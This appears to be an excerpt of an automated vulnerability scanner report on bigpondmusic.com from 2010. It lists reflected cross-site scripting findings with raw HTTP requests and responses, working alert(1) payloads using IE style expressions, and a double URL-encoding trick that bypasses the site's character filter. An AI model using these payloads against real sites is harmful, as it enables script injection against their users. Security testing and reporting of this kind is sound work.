The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d86"style%3d"x%3aexpression(alert(1))"8fb9c4a702b was submitted in the cid parameter. This input was echoed as 75d86"style="x:expression(alert(1))"8fb9c4a702b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/guy-sebastian/twenty-ten/?cid=hm-guy75d86"style%3d"x%3aexpression(alert(1))"8fb9c4a702b HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:19:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 148108
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Guy Sebastian - Twenty Ten - ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/guy-sebastian/twenty-ten/?cid=hm-guy75d86"style="x:expression(alert(1))"8fb9c4a702b" /> ...[SNIP]...
2.65. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/guy-sebastian/twenty-ten/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d1b"style%3d"x%3aexpression(alert(1))"2964101664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3d1b"style="x:expression(alert(1))"2964101664 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/guy-sebastian/twenty-ten/?d3d1b"style%3d"x%3aexpression(alert(1))"2964101664=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 148112
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Guy Sebastian - Twenty Ten - ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/guy-sebastian/twenty-ten/?d3d1b"style="x:expression(alert(1))"2964101664=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74bc7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d6147d7b3b was submitted in the REST URL parameter 1. This input was echoed as 74bc7"><script>alert(1)</script>3d6147d7b3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album74bc7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d6147d7b3b/james-blunt/some-kind-of-trouble HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:21:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87993
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e73c'%3bae196294df9 was submitted in the REST URL parameter 1. This input was echoed as 4e73c';ae196294df9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album4e73c'%3bae196294df9/james-blunt/some-kind-of-trouble HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87998
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.68. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/james-blunt/some-kind-of-trouble
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804a1"style%3d"x%3aexpression(alert(1))"cc0e770a23b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 804a1"style="x:expression(alert(1))"cc0e770a23b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/james-blunt/some-kind-of-trouble?804a1"style%3d"x%3aexpression(alert(1))"cc0e770a23b=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:21:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123452
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>James Blunt - Some Kind Of T ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble?804a1"style="x:expression(alert(1))"cc0e770a23b=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30cfeaa9154 was submitted in the REST URL parameter 1. This input was echoed as 8a220"><script>alert(1)</script>30cfeaa9154 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album8a220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30cfeaa9154/jebediah/lost-my-nerve HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88077
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b225c'%3bbfd4f81406a was submitted in the REST URL parameter 1. This input was echoed as b225c';bfd4f81406a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumb225c'%3bbfd4f81406a/jebediah/lost-my-nerve HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87850
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c136"style%3d"x%3aexpression(alert(1))"9fa3aac2c39 was submitted in the h parameter. This input was echoed as 4c136"style="x:expression(alert(1))"9fa3aac2c39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/jebediah/lost-my-nerve?h=7663953484c136"style%3d"x%3aexpression(alert(1))"9fa3aac2c39 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:29:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 97105
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Jebediah - Lost My Nerve - B ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/jebediah/lost-my-nerve?h=7663953484c136"style="x:expression(alert(1))"9fa3aac2c39" /> ...[SNIP]...
2.72. http://bigpondmusic.com/album/jebediah/lost-my-nerve [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/jebediah/lost-my-nerve
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bc1"style%3d"x%3aexpression(alert(1))"5bf96062524 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14bc1"style="x:expression(alert(1))"5bf96062524 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/jebediah/lost-my-nerve?14bc1"style%3d"x%3aexpression(alert(1))"5bf96062524=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:26:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 96924
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Jebediah - Lost My Nerve - B ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/jebediah/lost-my-nerve?14bc1"style="x:expression(alert(1))"5bf96062524=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97338'%3ba8b005e798b was submitted in the REST URL parameter 1. This input was echoed as 97338';a8b005e798b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album97338'%3ba8b005e798b/katy-perry/teenage-dream2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:24:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87906
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91242%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88b03c31949 was submitted in the REST URL parameter 1. This input was echoed as 91242"><script>alert(1)</script>88b03c31949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album91242%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88b03c31949/katy-perry/teenage-dream2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88218
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d910c"style%3d"x%3aexpression(alert(1))"024dde3346f was submitted in the h parameter. This input was echoed as d910c"style="x:expression(alert(1))"024dde3346f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/katy-perry/teenage-dream2?h=721914442d910c"style%3d"x%3aexpression(alert(1))"024dde3346f HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 119924
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.76. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/katy-perry/teenage-dream2
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c9b0"style%3d"x%3aexpression(alert(1))"852375c399a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c9b0"style="x:expression(alert(1))"852375c399a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/katy-perry/teenage-dream2?7c9b0"style%3d"x%3aexpression(alert(1))"852375c399a=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 119868
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1527c'%3b7ca3ed36b7c was submitted in the REST URL parameter 1. This input was echoed as 1527c';7ca3ed36b7c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album1527c'%3b7ca3ed36b7c/ke-ha/we-r-who-we-r HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88208
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
